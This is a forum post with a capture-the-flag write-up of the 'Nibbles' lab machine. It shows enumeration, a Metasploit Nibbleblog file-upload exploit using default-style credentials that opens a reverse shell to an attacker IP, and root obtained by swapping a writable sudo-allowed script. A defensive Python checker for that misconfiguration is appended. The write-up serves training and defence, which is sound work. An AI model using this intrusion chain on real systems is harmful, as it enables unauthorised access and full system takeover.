
Showing results for tags 'nibbles'.


  1. h3xu

    Nibbles

# Enumeration

## NMAP

The nmap scan reveals 2 open ports:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Let's see what's the WebApp like.

We're greeted by a ***Hello World!*** message.

![[Pasted image 20210409152510.png]]

The source code of the page reveals a directory:

![[Pasted image 20210409152620.png]]

## Dirbuster

Using dirbuster, I have found files within the /nibbleblog/content/private/config.xml directory and was able to enumerate possible users:

![[Pasted image 20210409152955.png]]

I also found a feed.php file, which led me into researching whether it was a possible attack vector. The research led me to this interesting article about feed.php and XSS: [feed injection in web](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/EN-Feed%20Injection%20In%20Web%202.0.pdf)

Anyway, while it was an interesting find, I did not see how it would apply here. So I continued looking.

## Searchsploit

I was going nowhere until I simply typed:

```
searchsploit nibble
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                             | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                              | php/remote/38489.rb
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

Ahh, it looks like we have a hit. Let's try metasploit:

```
msf6 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
```

I have used the previously enumerated username:password == admin:nibbles:

```
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Sending stage (39282 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.75:32812) at 2021-04-09 08:00:26 -0400
```

In the following lines I am interacting with the shell. Finally, I discovered an interesting file that has 777 rights.

```
meterpreter > shell
Process 1587 created.
Channel 0 created.
whoami
nibbler
python3 -c 'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler
<ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal/stuff/
cd personal/stuff/
nibbler@Nibbles:/home/nibbler/personal/stuff$ file monitor.sh
file monitor.sh
monitor.sh: ASCII text
nibbler@Nibbles:/home/nibbler/personal/stuff$ ll
ll
ll: command not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
```

Catting the file revealed nothing interesting though. After some time, I tried:

```
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

AHA! This is our gate to escalating privileges. I have removed the unzipped file and instead uploaded a simple bash script:

```
nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh
rm monitor.sh
```

I could not use any editors on the machine, so I had to create it locally and upload it to the victim.

```
meterpreter > upload monitor.sh
[*] uploading  : /home/kali/Desktop/monitor.sh -> monitor.sh
[*] Uploaded -1.00 B of 21.00 B (-4.76%): /home/kali/Desktop/monitor.sh -> monitor.sh
[*] uploaded   : /home/kali/Desktop/monitor.sh -> monitor.sh
```

I have moved the file to ***/home/nibbler/personal/stuff*** and executed the following commands to gain root:

```
cat monitor.sh
bash -i
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
bash: cannot set terminal process group (1360): Inappropriate ioctl for device
bash: no job control in this shell
root@Nibbles:/home/nibbler/personal/stuff# id
id
uid=0(root) gid=0(root) groups=0(root)
```
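A defensive check for the misconfiguration this writeup ends on, a sudoers rule whose target script lives in a location the unprivileged user controls. This is an added example, not part of the original post; `sudo_commands` and `writable_findings` are hypothetical helper names, and the embedded sample is the rule from the `sudo -l` output quoted above.

```python
import os
import re
import stat

# Rule lines of the `sudo -l` output quoted in the writeup (embedded sample).
SUDO_L = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # leading NOPASSWD:, SETENV:, ...

def sudo_commands(text):
    """Return (runas, command_path) for every absolute command in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        for cmd in (m["cmds"].split(",") if m else []):
            words = TAGS.sub("", cmd.strip()).split()
            if words and words[0].startswith("/"):
                rules.append((m["runas"], words[0]))
    return rules

def writable_findings(path, trusted_uids=(0,), stop="/"):
    """List each component from `path` up to `stop` that an untrusted user could change."""
    findings = []
    cur, stop = os.path.realpath(path), os.path.realpath(stop)
    while True:
        try:
            st = os.stat(cur)
        except FileNotFoundError:
            findings.append((cur, "missing: whoever can write the parent can create it"))
        else:
            # A sticky directory (e.g. /tmp) does not let others replace entries.
            sticky = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
            if st.st_uid not in trusted_uids:
                findings.append((cur, f"owned by uid {st.st_uid}"))
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky:
                findings.append((cur, f"group/world-writable {stat.filemode(st.st_mode)}"))
        parent = os.path.dirname(cur)
        if cur == stop or parent == cur:
            return findings
        cur = parent

if __name__ == "__main__":
    for runas, cmd in sudo_commands(SUDO_L):
        for where, why in writable_findings(cmd):
            print(f"({runas}) {cmd}: {where} {why}")
```

Any finding means the rule effectively grants its run-as user to whoever controls that path; the fix is a root-owned, non-writable script in a root-owned directory, or removing the rule.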
